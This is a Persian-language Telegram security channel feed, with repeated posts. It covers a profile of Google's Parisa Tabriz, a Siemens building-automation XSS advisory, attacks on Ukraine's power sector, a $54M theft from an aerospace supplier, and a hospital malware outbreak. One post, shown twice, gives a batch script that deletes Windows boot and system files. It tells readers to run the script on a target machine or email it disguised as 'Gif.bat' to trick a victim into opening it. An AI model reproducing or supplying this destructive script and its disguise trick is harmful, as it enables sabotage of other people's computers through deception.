به تازگی خبرنگار مجله "ELLE" به دیدار این کارمند ارشد گوگل، در مقر این کمپانی در کالیفرنیا رفته و با وی گفتوگویی انجام داده است. گفتوگو در سالن کنفرانس گوگل انجام شده، چون طبق قوانین گوگل خبرنگاران اجازه ورود به ساختمانی را که پریسا تبریز در آن کار میکند، ندارند. در تمام مدت گفتوگو نیز یک محافظ این خبرنگار را همراهی میکرده؛ حتی هنگام رفتن به دستشویی.
پریسا تبریز، ۳۱ ساله، در حومه شهر شیکاگو بزرگ شده است؛ مادرش پرستاری آمریکایی − لهستانی و پدرش یک پزشک مهاجر ایرانی است. او در سال ۲۰۰۷ به استخدام گوگل درآمد و دهمین عضو تیم کوچکی از هکرها در این کمپانی شد. وظیفه این تیم در یک کلام تأمین امنیت نرمافزارهای گوگل بود. اما اکنون این تیم گسترش یافته و بیش از ۲۵۰ متخصص امنیتی در گوگل مشغول به کار هستند.
پریسا تبریز آن طور که خود میگوید، در دوران کالج برای نخستین بار با کامپیوتر کار کرده و تا آن موقع وقتش را با هنر، ورزش و رقابت با دو برادرش سپری میکرده است. او که در ریاضی و علوم استعداد داشته، سپس وارد دانشگاه ایلینوی شده و اندکی بعد نیز علاقه به امور کامپیوتری در او بیدار میشود.
مقاومت در برابر وسوسه پول
پریسا تبریز به گروه هکرهای "کلاه سفید" تعلق دارد که در مقابل هکرهای "کلاه سیاه" قرار دارند. کلاه سفیدها به سیستمها نفوذ میکنند، اما از این نفوذ نیت بدی ندارند و هدفشان بررسی امنیت سیستم، شناسایی خلاءهای امنیتی و ارتقای استحکام سیستم است. او توضیح میدهد که برای استخدام به دنبال آنهایی باید باشند که توانایی رخنه به بهترینسیستمها را داشته باشند، اما در عین حال اینقدر از نظر شخصیتی قوی باشند که بتوانند در مقابل وسوسه پول مقاومت کنند و خریدنی نباشند.
در حال حاضر شرکتها به کسانی که قادر به یافتن باگها در سیستم باشند و آنها را گزارش دهند، پول پرداخت میکنند. برای مثال این مبلغ نزد گوگل، آن طور که خانم تبریز میگوید، از ۲۵ هزار تا ۶۰ هزار دلار متغیر است.
طبق گزارش مجله "ELLE" بخشی که پریسا تبریز ریاست آن را بر عهده دارد، بیش از ۳۰ هکر در اروپا و آمریکا را شامل میشود که کارشان بررسی تهدیدات امنیتی به طور ویژه مربوط به موتور جستجوی گوگل کروم است.
همین تیم بود که در سال ۲۰۱۱ متوجه هک شدن شرکت هلندی "دیجی نوتار" شد. هکرها در این حمله موفق به ربودن گواهینامههای امنیتی دیجیتال این شرکت و صدور گواهینامههای جعلی شده بودند و به این ترتیب حساب جیمیل صدها هزار کاربر ایرانی را هک کردند.
پریسا تبریز با نگاهی به آینده از کمرنگشدن اهمیت "رمز عبور" خبر میدهد. به گفته او ورود به کامپیوترها و حسابهای کاربری از راههای فیزیکی صورت میگیرد، نظیر اثر انگشت که هم اکنون آیفون از آن بهرهمیگیرد و این تازه آغاز راه است.—-------
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
🔴چگونه یک کامپیوتر را به راحتی از کار بیاندازیم
کافی است مجموعه کد های زیر را در نرم افزاری مانند نوت پد وارد و با نام hackpc.bat ذخیره نمایید. پسوند .bat برای نام فایل ضروريست:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
سپس این فایل را در کامپیوتر مورد نظر اجرا کنید.یا
اینکه توسط ایمیلی به فرد موردنظر ارسال کنید کافیست نام فایل را به Gif.bat تغییر داده و فرد موردنظر به خیال عکس بودن روی فایل کلیک کرده و کد اجرا شود.
🚨🚨🚨به یاد داشته باشید که هیچ وقت این کدها را روی کامپیوتر خودتان اجرا نکنید.
.......
در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
کافی است مجموعه کد های زیر را در نرم افزاری مانند نوت پد وارد و با نام hackpc.bat ذخیره نمایید. پسوند .bat برای نام فایل ضروريست:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
سپس این فایل را در کامپیوتر مورد نظر اجرا کنید.یا
اینکه توسط ایمیلی به فرد موردنظر ارسال کنید کافیست نام فایل را به Gif.bat تغییر داده و فرد موردنظر به خیال عکس بودن روی فایل کلیک کرده و کد اجرا شود.
🚨🚨🚨به یاد داشته باشید که هیچ وقت این کدها را روی کامپیوتر خودتان اجرا نکنید.
.......
در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
🚨🚨 زیمنس وصله امنیتی برای محصولات اتوماسیون ساختمان ارائه داد
زیمنس به روز رسانی سیستم عامل برای رسیدگی به آسیب پذيري(XSS) موثر بر برخی از محصولات اتوماسیون ساختمان را منتشر کرد.
با توجه به اطلاعیه زیمنس، نقص وب سرور OZW به Synco و سایر محصولات یکپارچه برای نظارت از راه دور و کنترل دستگاه های عامل ساخت و ساز، مانند آنهایی که برای گرمایش و تهویه مطبوع استفاده میشود تاثیر می گذارد.
حفره امنیتی، به عنوان CVE-2016-1488 شناسایی، OZW672 و OZW772 ماژول های ارتباطات در حال اجرا سیستم عامل قبل از نسخه 6.00 تاثیر می گذارد. یک مهاجم می تواند آسیب پذیری با فریب کاربر به هدف قرار کلیک بر روی لینک های دستکاری شده بهره برداری.
آدیتیا سود، محقق اعتبار برای پیدا کردن و گزارش نقص XSS، گفت: اشکال در صفحه ورود به سایت در OZW672 و OZW772 تعبیه شده به وب سرور تاثیر می گذارد. و مهاجم می تواند با این ضعف به تغییر مسیر کاربران به وب سایت های فیشینگ، سرقت اطلاعات، و یا آنها را به دانلود نرم افزارهای مخرب بر روی دستگاه های خود مورد سوئ استفاده قرار گیرد.
لازم بدکردار است این آسیب پذیری به زیمنس از طریق ICS-CERT در 2015 ژوئن 10 گزارش شده است، اما پس از نزدیک به 7 ماه فروشنده به انتشار یک وصله اقدام کرده است. این نقص می تواند یک خطر جدی درصورت موفقیت به بهره برداری در برخواهد داشت.
"مهاجم می تواند به سادگی کاربر را فریب و هدف قراردهد با کلیک بر روی لینک صفحه وب، که به طور خودکار فرم HTTP باعث اجراي اسکریپت در مرورگر کاربرشود، که می تواند در دانلود از نرم افزارهای مخرب بر روی سیستم کاربر نهایی مورد بهره قرار گیرد.همچنین، ممکن است به آلوده شدن ماشین هایی که به عنوان بخشی از محیط SCADA استفاده می شود بیانجامد."
حملاتی که در آن سیستم های SCADA مورد هدف قرار میگیرند به طور فزاینده شایع است.حوادث اخیر در بخش انرژی اوکراین یک مثال کامل برای آسیب از یک حمله سایبری موفق می تواند باشد.
.......
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
زیمنس به روز رسانی سیستم عامل برای رسیدگی به آسیب پذيري(XSS) موثر بر برخی از محصولات اتوماسیون ساختمان را منتشر کرد.
با توجه به اطلاعیه زیمنس، نقص وب سرور OZW به Synco و سایر محصولات یکپارچه برای نظارت از راه دور و کنترل دستگاه های عامل ساخت و ساز، مانند آنهایی که برای گرمایش و تهویه مطبوع استفاده میشود تاثیر می گذارد.
حفره امنیتی، به عنوان CVE-2016-1488 شناسایی، OZW672 و OZW772 ماژول های ارتباطات در حال اجرا سیستم عامل قبل از نسخه 6.00 تاثیر می گذارد. یک مهاجم می تواند آسیب پذیری با فریب کاربر به هدف قرار کلیک بر روی لینک های دستکاری شده بهره برداری.
آدیتیا سود، محقق اعتبار برای پیدا کردن و گزارش نقص XSS، گفت: اشکال در صفحه ورود به سایت در OZW672 و OZW772 تعبیه شده به وب سرور تاثیر می گذارد. و مهاجم می تواند با این ضعف به تغییر مسیر کاربران به وب سایت های فیشینگ، سرقت اطلاعات، و یا آنها را به دانلود نرم افزارهای مخرب بر روی دستگاه های خود مورد سوئ استفاده قرار گیرد.
لازم بدکردار است این آسیب پذیری به زیمنس از طریق ICS-CERT در 2015 ژوئن 10 گزارش شده است، اما پس از نزدیک به 7 ماه فروشنده به انتشار یک وصله اقدام کرده است. این نقص می تواند یک خطر جدی درصورت موفقیت به بهره برداری در برخواهد داشت.
"مهاجم می تواند به سادگی کاربر را فریب و هدف قراردهد با کلیک بر روی لینک صفحه وب، که به طور خودکار فرم HTTP باعث اجراي اسکریپت در مرورگر کاربرشود، که می تواند در دانلود از نرم افزارهای مخرب بر روی سیستم کاربر نهایی مورد بهره قرار گیرد.همچنین، ممکن است به آلوده شدن ماشین هایی که به عنوان بخشی از محیط SCADA استفاده می شود بیانجامد."
حملاتی که در آن سیستم های SCADA مورد هدف قرار میگیرند به طور فزاینده شایع است.حوادث اخیر در بخش انرژی اوکراین یک مثال کامل برای آسیب از یک حمله سایبری موفق می تواند باشد.
.......
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
Forwarded from کانال تخصصی امنیت سایبری «کتاس»
This media is not supported in your browser
VIEW IN TELEGRAM
خبر : Windows Bridge(ابزار پورت کردن اپلیکشن های ios به ویندوز) به صورت Open Source منتشر شد!
چندی پیش مایکروسافت در کنفرانس بیلد 2015 یک پیش نمایش از Windows Bridg برای ios را ارائه کرد که به صورت Open Source منتشر شد. در واقع این ابزار قبلا با اسم پروژه Islandwood استفاده می شد اما در حال حاضر نام آن به Windows Bridge برای ios تغییر کرده که به صورت پیش نمایش ارائه شده است
http://barnamenevisan.org/Articles/Article4476.html
چندی پیش مایکروسافت در کنفرانس بیلد 2015 یک پیش نمایش از Windows Bridg برای ios را ارائه کرد که به صورت Open Source منتشر شد. در واقع این ابزار قبلا با اسم پروژه Islandwood استفاده می شد اما در حال حاضر نام آن به Windows Bridge برای ios تغییر کرده که به صورت پیش نمایش ارائه شده است
http://barnamenevisan.org/Articles/Article4476.html
barnamenevisan.org
Windows Bridge(ابزار پورت کردن اپلیکشن های ios به ویندوز) به صورت Open Source منتشر شد!
چندی پیش مایکروسافت در کنفرانس بیلد 2015 یک پیش نمایش از Windows Bridg برای ios را ارائه کرد که به صورت Open Source منتشر شد. در واقع این ابزار قبلا با اسم پروژه Islandwood استفاده می شد اما در حال حاضر نام آن به Windows Bridge برای ios تغییر کرده که به…
📌موج جدیدی از حملات سایبری علیه صنعت برق اوکراین
(20 و 21 ژانویه 2016)
در دور جدیدی از حملات، نیروگاههای برق اوکراین مورد حمله سایبری قرار گرفتند، اینبار از طریق malware که بر پایه تروجان منبع باز و آزادانه در دسترس که هیچ کس انتظار آن را نداشته اتفاق افتاده است. این malware سعی نموده است که به سیستم خرید از طریق یک فایل XLS اکسل مخرب بصورت فریب فیشنگ در ضمیمه یک ایمیل دست پیداکند.
نام این تروجان BlackEnergy می باشد برای کسب اطلاعات بیشتر به آدرس های زیر مراجعه نمایید:
http://www.theregister.co.uk/2016/01/21/ukraine_energy_utilities_attacked_again_with_open_source_trojan_backdoor/
http://www.scmagazine.com/new-wave-of-attacks-on-ukrainian-power-plants/article/466473/
http://thehill.com/policy/cybersecurity/266603-security-researcher-ukraine-power-grid-facing-new-wave-of-cyberattacks
.......
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
(20 و 21 ژانویه 2016)
در دور جدیدی از حملات، نیروگاههای برق اوکراین مورد حمله سایبری قرار گرفتند، اینبار از طریق malware که بر پایه تروجان منبع باز و آزادانه در دسترس که هیچ کس انتظار آن را نداشته اتفاق افتاده است. این malware سعی نموده است که به سیستم خرید از طریق یک فایل XLS اکسل مخرب بصورت فریب فیشنگ در ضمیمه یک ایمیل دست پیداکند.
نام این تروجان BlackEnergy می باشد برای کسب اطلاعات بیشتر به آدرس های زیر مراجعه نمایید:
http://www.theregister.co.uk/2016/01/21/ukraine_energy_utilities_attacked_again_with_open_source_trojan_backdoor/
http://www.scmagazine.com/new-wave-of-attacks-on-ukrainian-power-plants/article/466473/
http://thehill.com/policy/cybersecurity/266603-security-researcher-ukraine-power-grid-facing-new-wave-of-cyberattacks
.......
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
www.theregister.co.uk
Ukraine energy utilities attacked again with open source Trojan backdoor
Macro phish attempts to hook BlackEnergy borscht and battered sector
📌سازنده قطعات هواپیمایی ایرباس،مبلغ $ 54M را در سرقت سایبری از دست داد
یک شرکت مهندسی اتریشی پس از اعتراف به ضعف امنیتی IT به دنبال "سرقت سایبری" اعلام کرد هزینه کسری حسابهایش مبلغ $ 54M بوده است
گروه عملیاتی FACC که قطعات هواپیما برای غولهای هواپیمایی مانند بوئینگ و ایرباس می سازد، و اکثریت سهام آن متعلق به یک شرکت سهامی چینی است. اصرار دارد در این نفوذ سرورهای مالکیت معنوی، مهندسی، و عملیات در معرض خطر نبوده اند، و صرفا از لحاظ مالی متضرر شده است.
شرکت در بیانیه ای گفت: "گروه حسابداری مالی گروه عملیاتی FACC هدف تقلب سایبری قرار گرفته است. زیرساختهای FACC IT، امنیت داده ها، IPها و همچنین کسب و کار عملیاتی گروه توسط فعالیت های جنایی سایبری تحت تاثیر قرار نگرفته است. و آسیب وارده صرفا خروج حدود 50 میلیون یورو از بودجه در جریان است. هیئت مدیره اقدامات ساختاری فوری درنظر گرفته است و درحال ارزیابی خسارات و مطالبات بیمه میباشد."
تحقیقات اولیه و شواهد موجود حاکی از نفوذ از درون توسط افراد ناشناس است که مدیریت کل سیستم های حفاظت و سیستم های پرداخت الکترونیکی را دردست گرفته و باعث انحراف مسیر مقدار زیادی از پول نقد شده اند.
پلیس اتریش در حال بررسی، سرور های مالی شرکت برای پیدا کردن مجرمان است. این کاوش ها ممکن است ماه ها طول بکشد.
در پی انتشار این خبر قیمت سهام FACC تقریبا 20 درصد کاهش یافت.
آدرس خبر :
http://www.theregister.co.uk/2016/01/22/austrian_firm_loses_54m_hacking_attack/
.......
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/Information_security_management
یک شرکت مهندسی اتریشی پس از اعتراف به ضعف امنیتی IT به دنبال "سرقت سایبری" اعلام کرد هزینه کسری حسابهایش مبلغ $ 54M بوده است
گروه عملیاتی FACC که قطعات هواپیما برای غولهای هواپیمایی مانند بوئینگ و ایرباس می سازد، و اکثریت سهام آن متعلق به یک شرکت سهامی چینی است. اصرار دارد در این نفوذ سرورهای مالکیت معنوی، مهندسی، و عملیات در معرض خطر نبوده اند، و صرفا از لحاظ مالی متضرر شده است.
شرکت در بیانیه ای گفت: "گروه حسابداری مالی گروه عملیاتی FACC هدف تقلب سایبری قرار گرفته است. زیرساختهای FACC IT، امنیت داده ها، IPها و همچنین کسب و کار عملیاتی گروه توسط فعالیت های جنایی سایبری تحت تاثیر قرار نگرفته است. و آسیب وارده صرفا خروج حدود 50 میلیون یورو از بودجه در جریان است. هیئت مدیره اقدامات ساختاری فوری درنظر گرفته است و درحال ارزیابی خسارات و مطالبات بیمه میباشد."
تحقیقات اولیه و شواهد موجود حاکی از نفوذ از درون توسط افراد ناشناس است که مدیریت کل سیستم های حفاظت و سیستم های پرداخت الکترونیکی را دردست گرفته و باعث انحراف مسیر مقدار زیادی از پول نقد شده اند.
پلیس اتریش در حال بررسی، سرور های مالی شرکت برای پیدا کردن مجرمان است. این کاوش ها ممکن است ماه ها طول بکشد.
در پی انتشار این خبر قیمت سهام FACC تقریبا 20 درصد کاهش یافت.
آدرس خبر :
http://www.theregister.co.uk/2016/01/22/austrian_firm_loses_54m_hacking_attack/
.......
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/Information_security_management
www.theregister.co.uk
Airbus, Boeing aero parts maker loses $54m in cyber-stick-up
The hills are alive with the sound of cursing
📌 آلودگی ویندوز ایکس پی کامپیوترهای بیمارستان ملبورن استرالیا با تروجان
(ژانویه 2016)
کامپیوترهای بخش پاتولوژی بیمارستان سلطنتی ملبورن در ویکتوریا، استرالیا با نرم افزارهای مخرب در هفته گذشته آلوده شدند. بانک خون به روش های دستی برای پردازش نمونه بازگشته است و پاسخ مراجعان را بصورت تلفنی صرفا ارائه میکند و سیستم های آنلاین این بخش از کار افتاده اند. این موضوع بر رایانه های شخصی با سیستم عامل ویندوز XP تاثیر می گذارد.
برای اطلاعات تکمیلی به ادرسهای زیر مراجعه نمایید:
http://www.theage.com.au/victoria/royal-melbourne-hospital-attacked-by-damaging-computer-virus-20160118-gm8m3v.html
http://www.theregister.co.uk/2016/01/19/melbourne_hospital_pathology_wing_splattered_by_virus/
.......
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/Information_security_management
(ژانویه 2016)
کامپیوترهای بخش پاتولوژی بیمارستان سلطنتی ملبورن در ویکتوریا، استرالیا با نرم افزارهای مخرب در هفته گذشته آلوده شدند. بانک خون به روش های دستی برای پردازش نمونه بازگشته است و پاسخ مراجعان را بصورت تلفنی صرفا ارائه میکند و سیستم های آنلاین این بخش از کار افتاده اند. این موضوع بر رایانه های شخصی با سیستم عامل ویندوز XP تاثیر می گذارد.
برای اطلاعات تکمیلی به ادرسهای زیر مراجعه نمایید:
http://www.theage.com.au/victoria/royal-melbourne-hospital-attacked-by-damaging-computer-virus-20160118-gm8m3v.html
http://www.theregister.co.uk/2016/01/19/melbourne_hospital_pathology_wing_splattered_by_virus/
.......
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/Information_security_management
The Age
Computer virus wreaking havoc at Royal Melbourne Hospital
A virus has attacked the computer system of one of Melbourne's largest hospital networks, causing chaos for staff and patients who may face delays as a result.
کلیپ تصویری راجع به پریسا تبریز شاهزاده امنیت گوگل👆
.......
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
https://news.1rj.ru/str/ict_security 👈 join 👇
https://news.1rj.ru/str/ict_security
.......
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
https://news.1rj.ru/str/ict_security 👈 join 👇
https://news.1rj.ru/str/ict_security
Telegram
کانال تخصصی امنیت سایبری «کتاس»
تماس با ادمين📧:
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است